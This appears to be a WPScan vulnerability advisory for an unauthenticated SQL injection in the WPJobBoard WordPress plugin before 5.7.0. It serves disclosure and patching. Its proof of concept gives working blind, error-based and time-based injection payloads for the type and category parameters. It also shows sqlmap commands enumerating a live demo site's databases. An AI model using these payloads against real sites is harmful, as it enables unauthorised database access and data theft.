logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

WPJobBoard < 5.7.0 - Unauthenticated SQL Injection

Description

An Unauthenticated SQL Injection vulnerability was discovered in the WPJobBoard plugin v5.6.4 for WordPress.

Vulnerable parameters: type, category.

Proof of Concept

[$] :: Payloads (Boolean-based blind):

/advanced-search/?query=4325&location=4325&type=7)) AND 2392=(SELECT (CASE WHEN (2392=2392) THEN 2392 ELSE (SELECT 8365 UNION SELECT 6110) END))-- -&category=2&posted=30&results=1

/advanced-search/?query=4325&location=4325&type=7&category=2)) AND 5421=(SELECT (CASE WHEN (5421=5421) THEN 5421 ELSE (SELECT 5942 UNION SELECT 8466) END))-- -&posted=30&results=1


[$] :: Payloads (Error-based):

/advanced-search/?query=4325&location=4325&type=7)) AND EXTRACTVALUE(4031,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(4031=4031,1))),0x717a6a7171)) AND ((1099=1099&category=2&posted=30&results=1

/advanced-search/?query=4325&location=4325&type=7&category=2)) AND EXTRACTVALUE(5255,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(5255=5255,1))),0x717a6a7171)) AND ((5637=5637&posted=30&results=1


[$] :: Payloads (Time-based blind):

/advanced-search/?query=4325&location=4325&type=7)) AND SLEEP(5)#&category=2&posted=30&results=1
/advanced-search/?query=4325&location=4325&type=7&category=2)) AND SLEEP(5)#&posted=30&results=1

[!] :: PoC (SQLMap):

sqlmap --url="https://demo.wpjobboard.net/jobs/advanced-search/?query=4325&location=4325&type=7&category=2&posted=30&results=1" -dbs --user-agent=X --threads=2 --disable-precon --no-cast

[*] starting @ 15:47:39 /2020-10-24/

[15:47:39] [INFO] testing connection to the target URL
[15:47:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1 (Percona fork)
[15:47:45] [INFO] fetching database names
[15:47:47] [WARNING] reflective value(s) found and filtering out
[15:47:47] [WARNING] the SQL query provided does not return any output
[15:47:47] [INFO] fetching number of databases
[15:47:47] [INFO] resumed: 2
[15:47:47] [INFO] retrieving the length of query output
[15:47:47] [INFO] retrieved: 18
[15:49:10] [INFO] retrieved: information_schema
[15:49:10] [INFO] retrieving the length of query output
[15:49:10] [INFO] retrieved: 18
[15:50:31] [INFO] retrieved: simpliko_wpjb_demo
available databases [2]:
[*] information_schema
[REDACTED]

[*] ending @ 15:50:31 /2020-10-24/


sqlmap --url="https://demo.wpjobboard.net/jobs/advanced-search/?query=4325&location=4325&type=7&category=2&posted=30&results=1" -D REDACTED -tables --user-agent=X --threads=4 --disable-precon --no-cast

[*] starting @ 15:51:03 /2020-10-24/

[15:51:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1 (Percona fork)
[15:51:09] [INFO] fetching tables for database: 'REDACTED'
Database: REDACTED
[32 tables]
[REDACTED]

[*] ending @ 15:51:12 /2020-10-24/

Affects Plugins

wpjobboard

Fixed in version 5.7.0

References

URL

https://ex-mi.ru/exploit/[2020-10-24]-[WordPress]-wpjobboard-plugin-v5.6.4.txt

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website

https://ex-mi.ru

Verified

No

WPVDB ID

c0ec5f0c-5e66-48f2-87bc-56c6f0db1898

Timeline

Publicly Published

2020-11-25 (about 11 months ago)

Added

2020-11-25 (about 11 months ago)

Last Updated

2020-11-26 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin